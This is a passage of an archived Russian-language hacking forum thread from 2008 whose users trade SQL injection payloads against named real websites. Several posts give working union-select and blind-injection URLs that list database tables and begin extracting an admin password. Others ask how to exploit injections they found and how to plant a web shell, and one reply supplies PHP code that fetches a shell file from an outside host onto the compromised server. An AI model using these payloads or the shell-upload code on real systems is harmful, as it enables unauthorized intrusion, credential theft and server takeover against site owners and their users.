ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.12.2008, 23:24
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 Thrasher88
Это PostgreSQL, идем сюда и читаем http://forum.antichat.ru/showthread.php?t=35599
Пробуем
http://www.myprof.ru/prof.php?id=1+union+select+null,null,null--
получилось.
Принтабельные поля по статье найти не удалось, хз почему, но пробуем втупую через имя колонки
/prof.php?id=-1+union+select+TABLE_NAME,null,null+from+informati on_schema.tables--
и вуаля таблички есть 
Дальше сам, я не рыл |
|
|
30.12.2008, 02:50
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://research.sun.com/people/mybio.php?uid=-28941+or+1=1
явахек?))
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1,2,3,4,5 ,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information _schema.tables/*
логический вывод 5 ветка, что поделать?
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1+limit+1 ,1/*
не подбор
Последний раз редактировалось sabe; 30.12.2008 в 06:04..
|
|
|
|
30.12.2008, 12:19
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
проблема такая,есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл? инклуде не работает
и еще,когда записываешь в файл прибавляется такая фигня -
202 537 9.pdf 22042 application/pdf 1
1 2 202\ 537\ 9.pdf\ 22042\ application/pdf\ 1\
[сюда_вставляется_все_что_я_ аписываю_через_скуль]\ 2\ 3\ 4\ 5\ 6\
4 5 6
|
|
|
|
30.12.2008, 12:58
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Napas
есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл?
создавай .php файл:
<?php copy("http://site.com/shell.txt","./papka/na/servere/shell.php"); ?>
выполняй его, и shell.php будет твой шелл 
Последний раз редактировалось aka PSIH; 30.12.2008 в 13:01..
|
|
|
|
30.12.2008, 13:05
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
aka PSIH
не катит (
Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
можно ли еще что-нибудь сделать в такой ситуации?
Последний раз редактировалось Napas; 30.12.2008 в 14:20..
|
|
|
|
30.12.2008, 13:24
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
sabe
Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
Вот пример(точнее один из вариантов), всё просто
Подбираем таблицу:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+table_name+from+information_schema.tables+li mit+17,1),1,11))='admin_users'
Далее, вывод значения:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+password+from+admin_users+limit+0,1),1,2))=' mu'
Это незаконченный вывод
Добивать не стал. кому нужно разберутся )
Разумеется скриптами всё будет гораздо быстрее чем вручную
|
|
|
|
30.12.2008, 18:39
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 16
Провел на форуме:
59223
Репутация:
7
|
|
В админки есть возможность делать запросы к базе
Помогите составить правильно запрос чтобы закачать файл на сервер.
Сори если не туда.
|
|
|
|
30.12.2008, 20:12
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
Нашел очередную скулю на сайте какогото импортного хостера:
http://www.agenciarwebhost.com.br/planos/index.php?id=-1'
Подскажите, как раскрутить? И в чем там вообще проблема?
|
|
|
|
30.12.2008, 20:28
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Код:
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+in+'.'
выдает: Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
кто дальше пробьется? |
|
|
|
30.12.2008, 21:00
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Gemini12
кто дальше пробьется?
А куда дальше-то? Обычная скуль, MSSQL, отлично крутится всё в порядке, никаких аномалий
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' tbl_comps','all_tovar','allprice','banner'))--
и т.д
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид